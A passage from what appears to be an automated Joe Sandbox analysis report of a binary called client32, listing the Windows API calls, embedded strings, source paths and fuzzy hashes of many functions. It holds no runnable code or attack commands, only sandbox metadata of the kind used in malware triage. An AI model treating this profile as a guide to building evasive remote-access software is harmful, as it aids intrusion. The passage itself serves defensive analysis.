                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 110193F7
                                                                              • _memmove.LIBCMT ref: 1101941B
                                                                              • _memmove.LIBCMT ref: 11019455
                                                                              • _memmove.LIBCMT ref: 11019471
                                                                              • std::exception::exception.LIBCMT ref: 110194BB
                                                                              • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                              • String ID: deque<T> too long
                                                                              • API String ID: 827257264-309773918
                                                                              • Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                              • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                              • Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                              • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                              APIs
                                                                              • _strncpy.LIBCMT ref: 1113C41F
                                                                              • IsWindow.USER32(00000000), ref: 1113C451
                                                                              • _malloc.LIBCMT ref: 1113C4B0
                                                                              • _memmove.LIBCMT ref: 1113C515
                                                                              • SendMessageTimeoutA.USER32(00000000,0000004A,00040270,00000003,00000002,00002710,?), ref: 1113C56F
                                                                              • _free.LIBCMT ref: 1113C576
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLastMessageSendTimeoutWindow_free_malloc_memmove_strncpy
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                              • API String ID: 1602665774-2270926670
                                                                              • Opcode ID: e2abf284167a6e6cb6024ac74b78426798698c9d11ed7799c078f4a418bb9f00
                                                                              • Instruction ID: a2dd537b469b56fd0a393197ec2e6fa62d94d6918f16b8d23f7c7785d4e9094b
                                                                              • Opcode Fuzzy Hash: e2abf284167a6e6cb6024ac74b78426798698c9d11ed7799c078f4a418bb9f00
                                                                              • Instruction Fuzzy Hash: 5D51C134A0120AAFDB00DF94DD81FEEF7B9EF89718F104125F915A7284E771AA04CB91
                                                                              APIs
                                                                                • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,AB86ACF8,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                • Part of subcall function 11010CD0: _memmove.LIBCMT ref: 11010D0D
                                                                              • shutdown.WSOCK32(?,00000002,00000000,00000000,00000000), ref: 110D81F9
                                                                              • closesocket.WSOCK32(?), ref: 110D8203
                                                                              • __CxxThrowException@8.LIBCMT ref: 110D8229
                                                                              • _memset.LIBCMT ref: 110D827C
                                                                              • gethostname.WSOCK32(?,00000200,0000005C,00000000,111EE030), ref: 110D8290
                                                                              • gethostbyname.WSOCK32(?), ref: 110D82C1
                                                                              • inet_ntoa.WSOCK32 ref: 110D82EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalEnterException@8SectionThrow_memmove_memsetclosesocketgethostbynamegethostnameinet_ntoashutdown
                                                                              • String ID: 127.0.0.1
                                                                              • API String ID: 3213037012-3619153832
                                                                              • Opcode ID: 0667ac5c8d136c85764237683a7513ac93f65a2d80e195fcd17a6dc8b2304ea0
                                                                              • Instruction ID: aa17ea021d3ed84f241b33fe3108128a88572c75fddb31a861601ff691f486d7
                                                                              • Opcode Fuzzy Hash: 0667ac5c8d136c85764237683a7513ac93f65a2d80e195fcd17a6dc8b2304ea0
                                                                              • Instruction Fuzzy Hash: C651B675D00758AFDB24CFA4C884B9EFBB8EB08714F00466DE45697680DB75AA48CF90
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                              • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                              • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                              • String ID: 8
                                                                              • API String ID: 762489935-4194326291
                                                                              • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                              • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                              • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                              • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • PostMessageA.USER32(0000FFFF,0000C1C4,00000000,00000000), ref: 1104C4D9
                                                                              • PostMessageA.USER32(00040270,0000048F,00000032,00000000), ref: 1104C50A
                                                                              • PostMessageA.USER32(00040270,00000483,00000000,00000000), ref: 1104C51C
                                                                              • PostMessageA.USER32(00040270,0000048F,000000C8,00000000), ref: 1104C530
                                                                              • PostMessageA.USER32(00040270,00000483,00000001,?), ref: 1104C547
                                                                              • PostMessageA.USER32(00040270,00000800,00000000,00000000), ref: 1104C558
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePost$__wcstoi64
                                                                              • String ID: Client$UnloadMirrorOnEndView
                                                                              • API String ID: 1802880851-3586292995
                                                                              • Opcode ID: a41bae29c585707371357c8caec9141dff0e8bf7478b157c6d85ab70ef4f8417
                                                                              • Instruction ID: f03e4b2a21c92520a355d730a4440e838d8bebb2f72c7bea427c3ee4d591d5f8
                                                                              • Opcode Fuzzy Hash: a41bae29c585707371357c8caec9141dff0e8bf7478b157c6d85ab70ef4f8417
                                                                              • Instruction Fuzzy Hash: 7641B275A42231ABE315DB90CC81FBAB7A8BB85B18F108569F61557288CB70B940CBD1
                                                                              APIs
                                                                              Strings
                                                                              • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1114809D
                                                                              • %02X , xrefs: 111480E2
                                                                              • Callstack:, xrefs: 111480FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$CurrentReadThread
                                                                              • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
                                                                              • API String ID: 477357799-160799177
                                                                              • Opcode ID: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
                                                                              • Instruction ID: 6f7d134abcf48abb40f6f3b0b22a813e08fdaf2ee64347ae44ec59e5a96c1c79
                                                                              • Opcode Fuzzy Hash: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
                                                                              • Instruction Fuzzy Hash: 23410DB1200705AFDB54CFA8DC90F97B7E9BB48608F148918F96DC7644DB30B914CB61
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                              • _memset.LIBCMT ref: 11005240
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                              • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                              • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2755257978-4108050209
                                                                              • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                              • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                              • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                              • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                              APIs
                                                                              Strings
                                                                              • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                              • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                              • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                              • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                              • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Sleep
                                                                              • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                              • API String ID: 4250438611-314227603
                                                                              • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                              • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                              • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                              • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                              APIs
                                                                              • _strncmp.LIBCMT ref: 1100953A
                                                                              • _strncmp.LIBCMT ref: 1100954A
                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,AB86ACF8), ref: 110095EB
                                                                              Strings
                                                                              • https://, xrefs: 1100952F
                                                                              • IsA(), xrefs: 110095A5, 110095CD
                                                                              • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                              • http://, xrefs: 11009535, 11009548
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncmp$FileWrite
                                                                              • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                              • API String ID: 1635020204-3154135529
                                                                              • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                              • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                              • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                              • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111440A6
                                                                              • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 111440B8
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111440F4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 11144111
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$Free$AddressErrorExitLastLoadMessageProcProcesswsprintf
                                                                              • String ID: ..\ctl32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                              • API String ID: 2160193376-301070788
                                                                              • Opcode ID: e44ab046283bc651aae464860159ad9237f7330829552d468496f3076074b2e2
                                                                              • Instruction ID: 8ec37360b6af12359677f4f789901c443318a14bbc26c3183c6290fe893a0892
                                                                              • Opcode Fuzzy Hash: e44ab046283bc651aae464860159ad9237f7330829552d468496f3076074b2e2
                                                                              • Instruction Fuzzy Hash: 1331D176F0021A9BCB04DFE9D880BEEF7B4EF58759F10006EE919A7B00DB7059008B91
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,?,?,?,1102E5E1,?,?,11195264,Trying to get mac addr for %u.%u.%u.%u,?,000000FF,?,?), ref: 1112C1D5
                                                                              • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112C1EE
                                                                              • wsprintfA.USER32 ref: 1112C23B
                                                                              • wsprintfA.USER32 ref: 1112C253
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,1102E5E1), ref: 1112C268
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                              • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                              • API String ID: 435568443-4085816232
                                                                              • Opcode ID: 369f9b8d5815293f31972576267f122e4637ba767a623a1c15d1d01a0f387f78
                                                                              • Instruction ID: 8760d0f24f13fbd9c3f6f7c142518e86b4ebf2eaea43770ddc67536ce621ef3a
                                                                              • Opcode Fuzzy Hash: 369f9b8d5815293f31972576267f122e4637ba767a623a1c15d1d01a0f387f78
                                                                              • Instruction Fuzzy Hash: DD217172E0011D9BCB14CFE6DD84AEEFBB4EF49A14F554118ED18A3300EB349905CBA0
                                                                              APIs
                                                                                • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                              • _memset.LIBCMT ref: 110D225D
                                                                              • _strncpy.LIBCMT ref: 110D2270
                                                                              • CreateMutexA.KERNEL32(0000FFFF,00000000,110AECC7,AB86ACF8,0000FFFF,?,00000000), ref: 110D2282
                                                                              • OpenMutexA.KERNEL32(00100001,00000000,110AECC7), ref: 110D2296
                                                                              • GetLastError.KERNEL32 ref: 110D22A5
                                                                              • wsprintfA.USER32 ref: 110D22B9
                                                                              • OutputDebugStringA.KERNEL32(?), ref: 110D22C9
                                                                              Strings
                                                                              • CreateMutex() FAILED - mutex: %s (%d), xrefs: 110D22B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DescriptorMutexSecurity$AllocCreateDaclDebugErrorInitializeLastLocalOpenOutputString_memset_strncpywsprintf
                                                                              • String ID: CreateMutex() FAILED - mutex: %s (%d)
                                                                              • API String ID: 1226361317-2228366408
                                                                              • Opcode ID: 2384ea77c9b49aa6311800397e6ac125b36c4dd999786081d16b963adf27bd01
                                                                              • Instruction ID: 2d0f1180b9456f53bee9e3a362c2732001871efe099aa789405d963e56971bda
                                                                              • Opcode Fuzzy Hash: 2384ea77c9b49aa6311800397e6ac125b36c4dd999786081d16b963adf27bd01
                                                                              • Instruction Fuzzy Hash: 4521E0B6940358AFD710DFA4CC84FEABBBCEB48B14F00496AF92593644E770A644CB60
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                              • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                              • GetDlgItem.USER32(?,?), ref: 11023414
                                                                              • SetFocus.USER32(00000000), ref: 11023417
                                                                              • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1605826578-1986719024
                                                                              • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                              • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                              • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                              • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                              • _memset.LIBCMT ref: 1114515E
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                              • CreatePopupMenu.USER32 ref: 111451AA
                                                                              • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                              • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                              • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 74472576-4108050209
                                                                              • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                              • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                              • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                              • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                              APIs
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • EnableWindow.USER32(?,00000000), ref: 1100403D
                                                                              • ChooseFontA.COMDLG32(?), ref: 11004043
                                                                              • DeleteObject.GDI32(?), ref: 11004054
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1100405E
                                                                              • InvalidateRect.USER32(00000000,00000000,00000001), ref: 110040AB
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110040D5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableExitFontProcessWindow$ChooseCreateDeleteErrorIndirectInvalidateLastMessageObjectRect_strrchrwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1877081333-2830328467
                                                                              • Opcode ID: 5a8ff3a3b695677d670fb872e9d6a603d23825acbc13e7a7cbff1a86c384b7c4
                                                                              • Instruction ID: 2c0d29b8726898d4e875131a5ddb42b893b31e3c9b3cc9d7239d82f15ed8fa9a
                                                                              • Opcode Fuzzy Hash: 5a8ff3a3b695677d670fb872e9d6a603d23825acbc13e7a7cbff1a86c384b7c4
                                                                              • Instruction Fuzzy Hash: 851181B5A4030ABBD724CBA1DCC6FDAF3A4FB48348F00456DF526A6584DB75B540C754
                                                                              APIs
                                                                              • _free.LIBCMT ref: 11044287
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 110442A7
                                                                              • _strncpy.LIBCMT ref: 110442D5
                                                                              • _strncpy.LIBCMT ref: 11044312
                                                                              • _malloc.LIBCMT ref: 1104434C
                                                                              • _strncpy.LIBCMT ref: 1104435D
                                                                              • _strncpy.LIBCMT ref: 1104439F
                                                                              • _malloc.LIBCMT ref: 110443D2
                                                                              • _strncpy.LIBCMT ref: 110443E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 1102513549-0
                                                                              • Opcode ID: bd44c6ba14c597139a1bcf2485ccbb1e776856b1063963ef6c7a2147c4b94ce6
                                                                              • Instruction ID: 974b4f05892340fefa329837356e5b9fb129ea13f76464e8485f75d9f21f6bbc
                                                                              • Opcode Fuzzy Hash: bd44c6ba14c597139a1bcf2485ccbb1e776856b1063963ef6c7a2147c4b94ce6
                                                                              • Instruction Fuzzy Hash: 87616CB5D043559FD720DFB9C884BDAFBF9AF95308F0045AD9599D7200EAB0A980CFA1
                                                                              APIs
                                                                              • IsDlgButtonChecked.USER32(?,0000046F), ref: 110440DA
                                                                              • IsDlgButtonChecked.USER32(?,00000470), ref: 110440ED
                                                                              • DestroyCursor.USER32(?), ref: 11044171
                                                                              • DestroyCursor.USER32(?), ref: 1104417A
                                                                              • DestroyCursor.USER32(00000000), ref: 1104418E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CursorDestroy$ButtonChecked
                                                                              • String ID:
                                                                              • API String ID: 2664327029-0
                                                                              • Opcode ID: 65e359f5a7e490632b0b05df749bb47df57bf5184124e9409809c9d7eebbec92
                                                                              • Instruction ID: d93bb8d91901fd52fc514ae9055c1649e3b087614cd6c7895e3b48934665d2c2
                                                                              • Opcode Fuzzy Hash: 65e359f5a7e490632b0b05df749bb47df57bf5184124e9409809c9d7eebbec92
                                                                              • Instruction Fuzzy Hash: 4531B6B6F00B01A7F710C675CCC1F9772D9AB94304F224539E679C7A90DA75E841C754
                                                                              APIs
